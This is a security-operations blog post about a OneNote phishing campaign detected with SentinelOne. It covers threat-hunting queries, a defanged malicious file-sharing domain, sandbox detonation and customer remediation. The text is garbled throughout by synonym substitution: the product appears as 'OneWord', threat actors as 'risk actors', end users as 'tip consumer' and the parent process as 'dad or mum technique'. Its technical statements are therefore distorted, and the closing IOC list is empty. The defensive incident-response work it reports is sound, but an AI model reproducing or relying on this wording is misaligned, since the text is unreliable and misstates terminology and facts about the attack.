Stories from the SOC: OneWord MalSpam – Detection & response

This weblog was co-written with Kristen Perreault – Professional Cybersecurity and James Rodriguez – Sr. Specialist Cybersecurity.

Executive abstract

Since December twenty second, 2022, there was a rise in malware despatched by way of Phishing emails by way of a OneWord attachment. As with most phishing emails, the tip consumer would open the OneWord attachment however not like Microsoft Word or Microsoft Excel, OneWord doesn’t help macros. This is how risk actors beforehand launched scripts to put in malware.

Minimal documentation has been made in direction of the techniques, methods, and procedures (TTP’s) noticed in these assaults. Some of the TTP’s noticed included executions of Powershell.exe utilization and Curl.exe as soon as a hidden course of was ran. Once the hidden executable was clicked on, a connection was made to an exterior web site to try to put in and execute malware. Once executed the attacker will unload further malicious information and achieve inside info from throughout the group. In this case, malicious information had been detected and mitigated by SentinelOne.

Investigation

Initial Alarm Review

Indicators of Compromise (IOC)

The preliminary alarm got here in for malware being detected by SentinelOne which was a .One file kind. The file sourced from Outlook indicated this was doubtless a phishing e-mail. Shortly after receiving the preliminary alarm, the MES SOC Threat Hunters (SECTOR Team) had been alerted by a buyer experiencing this exercise and commenced their deep dive. Upon coming into the file hash obtained from the SentinelOne occasion, no discernible info relating to the file’s function was uncovered. This prompted SECTOR to make the most of Deep Visibility to realize additional perception into the method and function of the detected file.

Deep Visibility is a function inside SentinelOne that gives complete perception into the actions and behaviors of threats inside a community setting. This function permits safety groups, reminiscent of SECTOR, to research and reply to threats by offering higher perception in processes, community connections, and file actions. It is an extremely highly effective software in SentinelOne and is often used in the course of the Incident Response course of.

Expanded investigation

Events Search

A search string was created for Deep Visibility which included the file identify and related file hashes. An occasion in SentinelOne was discovered that included a Curl.exe course of with the exterior area minaato[.]com. When reviewing the area additional, it was decided that this was a file sharing web site and extra malicious indicators had been uncovered. Analyzing the DNS request to minaato[.]com, confirmed occasions with the supply course of mshta.exe with the goal course of curl.exe, and the dad or mum technique of onenote.exe. This chain of processes had been the heuristic (behavioral) attributes that prompted SentinelOne to fireside off an alert. Utilizing these TTP and former supply processes, a brand new question was generated to seek out any potential file populating the identical exercise. This led SECTOR to detect one other file underneath Cancellation[.]one.

Event Deep Dive

SECTOR started their occasion deep dive with an preliminary IOC primarily based search question that included the file identify and the area that generated outbound community connections.

Pivoting off of the outcomes from the preliminary IOC primarily based search question, SECTOR created a secondary search question that included a number of file names, domains, and hashes that had been discovered. These IOCs had not been beforehand found within the wild however as soon as they had been discovered, SECTOR supplied them to the AT&T AlienLabs staff for extra detection engines, correlation guidelines, and OTX (AT&T Open Threat Exchange Platform) pulse updates.

After gathering all of the IOCs, a 3rd heuristic-based search question was created. This new question aimed to seek out any remaining occasions associated to the malware that SentinelOne won’t have alerted on, because it primarily focuses on execution-based actions reasonably than behavior-based ones. This demonstrates the significance of utilizing risk searching at the side of SentinelOne’s Deep Visibility function for enhanced safety.

In the ultimate stage of the occasion search, SECTOR created a closing heuristic search question that detected any outreach to a website with the identical behavioral attributes noticed on this setting. Although the outcomes contained false positives, they had been in a position to sift via and discover an occasion the place the “ping.exe” command efficiently communicated with the malicious area, “minaato[.]com”. In this case, SentinelOne didn’t alert on this exercise on account of it being a typical course of execution.

Response

Building the Investigation

After gathering all crucial info and occasion findings, SECTOR was in a position to pull the malicious OneWord file and detonate it inside their sandbox setting. They had been then in a position to see that after the file was opened, the malicious hyperlink was hidden underneath an overlayed inventory Microsoft picture that requested the consumer to click on open. This then introduced the consumer to the malicious area, minaato[.]com.

SECTOR supplied all information gathered from this risk hunt to the affected prospects and fellow CyberSecurity Teams inside AT&T for situational consciousness.

Customer interplay

The affected prospects got remediation steps primarily based on the particular exercise they skilled with this malware. Some of them had been efficiently compromised, whereas others had been in a position to keep away from any execution or downloads in affiliation with the malware itself. These remediation steps included eradicating all information from the affected units, resetting all consumer passwords for finest practices, scanning belongings to make sure no additional unauthorized or malicious exercise was occurring within the background, globally blocking all IOC’s, and implementing block guidelines on their firewalls.

IOCS